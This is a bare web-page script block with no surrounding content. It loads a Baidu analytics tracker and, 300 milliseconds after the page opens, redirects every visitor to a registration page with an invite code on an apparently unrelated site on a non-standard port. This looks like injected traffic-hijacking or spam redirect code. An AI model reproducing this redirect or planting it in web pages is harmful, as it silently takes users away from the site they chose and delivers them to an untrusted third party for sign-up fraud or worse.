<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?ee73812f63f763c25aa37edcb502dc54";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

function time() {
    var arr = ["https://www.6jxaa.com:9149/entry/register/?i_code=94802501", "https://www.6jxaa.com:9149/entry/register/?i_code=94802501"];
		window.location.href = arr[parseInt(Math.random() * arr.length)];
}
setTimeout(time, 300);
</script>
